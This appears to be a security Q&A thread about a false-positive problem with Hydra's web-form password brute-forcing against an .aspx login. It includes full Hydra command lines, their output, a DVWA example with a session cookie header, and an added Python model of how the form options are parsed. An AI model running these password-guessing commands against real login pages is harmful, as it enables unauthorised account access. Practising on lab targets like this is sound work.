4

I've been playing around with Hydra and an .aspx site and I've hit a bit of a snag - Hydra responds letting me know that the first 16 passwords in my password list are correct when none of them are.

Syntax:

hydra 192.168.88.196 -l admin -P /root/lower http-post-form "/mmm/index.aspx:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

Output:

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2015-05-05 22:30:51
[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 192.168.88.196   login: admin   password: adrianna
[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)
[80][www-form] host: 192.168.88.196   login: admin   password: adrian
[80][www-form] host: 192.168.88.196   login: admin   password: aerobics
[80][www-form] host: 192.168.88.196   login: admin   password: academic
[80][www-form] host: 192.168.88.196   login: admin   password: access
[80][www-form] host: 192.168.88.196   login: admin   password: abc
[80][www-form] host: 192.168.88.196   login: admin   password: admin
[80][www-form] host: 192.168.88.196   login: admin   password: academia
[80][www-form] host: 192.168.88.196   login: admin   password: albatross
[80][www-form] host: 192.168.88.196   login: admin   password: alex
[80][www-form] host: 192.168.88.196   login: admin   password: airplane
[80][www-form] host: 192.168.88.196   login: admin   password: albany
[80][www-form] host: 192.168.88.196   login: admin   password: ada
[80][www-form] host: 192.168.88.196   login: admin   password: aaa
[80][www-form] host: 192.168.88.196   login: admin   password: albert
[80][www-form] host: 192.168.88.196   login: admin   password: alexander
1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-05-05 22:30:51

I have read that we can add cookies to Hydra, okay: "H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie>"

  1. How do you get cookies from aspx?
  2. How do you provide it to hydra?
schroeder
user3306821

1 Answer

4

Use a browser plugin such as Cookies Manager Plus on Firefox, then you can simply copy the value to the clipboard.

As you say, simply paste the value into the command line for Hydra.

See my answer here for the syntax that worked for me.

"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"

So instead of PHPSESSID and the value, you include the name of the ASP.NET session ID and value.

SilverlightFox
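
The following is an added example, not part of the original posts and not Hydra's own code: a simplified Python model of how the form option strings above split into path, body, condition and header, and why a failure-string condition reports a login as valid whenever that string is missing from the response. The function names and both response pages are constructed for illustration.

```python
import re

# The two module options as they appear on this page.
QUESTION_OPT = ("/mmm/index.aspx:username=^USER^&password=^PASS^&Login=Login"
                ":Username and/or password incorrect.")
ANSWER_OPT = ("/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^"
              "&Login=Login:F=incorrect"
              ":H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low")

# Constructed response bodies (assumptions, not captured from a real server).
FAIL_PAGE = "<span>Username and/or password incorrect.</span>"
NO_SESSION_PAGE = "<h1>Your session has expired, please reload the page.</h1>"


def parse_form_option(opt):
    """Split 'path:body:condition[:H=header]...' into its parts."""
    # Header values contain ':' themselves, so peel off the ':H=' parts first.
    head, *headers = re.split(r":H=", opt)
    path, body, cond = head.split(":", 2)
    # 'S=' marks a success string; 'F=' or no prefix marks a failure string.
    kind, text = "F", cond
    if cond[:2] in ("F=", "S="):
        kind, text = cond[0], cond[2:]
    return {"path": path, "body": body, "kind": kind, "text": text,
            "headers": dict(h.split(": ", 1) for h in headers)}


def reported_valid(opt, response_body):
    """True if this response would be counted as a valid login."""
    p = parse_form_option(opt)
    found = p["text"] in response_body
    # Failure-string mode: any page WITHOUT the string counts as success.
    return found if p["kind"] == "S" else not found


if __name__ == "__main__":
    print(parse_form_option(ANSWER_OPT)["headers"])
    # A real rejection contains the failure string: not reported.
    print(reported_valid(QUESTION_OPT, FAIL_PAGE))        # False
    # A page that never evaluated the password lacks it: false positive.
    print(reported_valid(QUESTION_OPT, NO_SESSION_PAGE))  # True
```

In failure-string mode a "valid" result only means the string was absent from the response, which is consistent with every one of the 16 parallel first attempts being reported in the question's output.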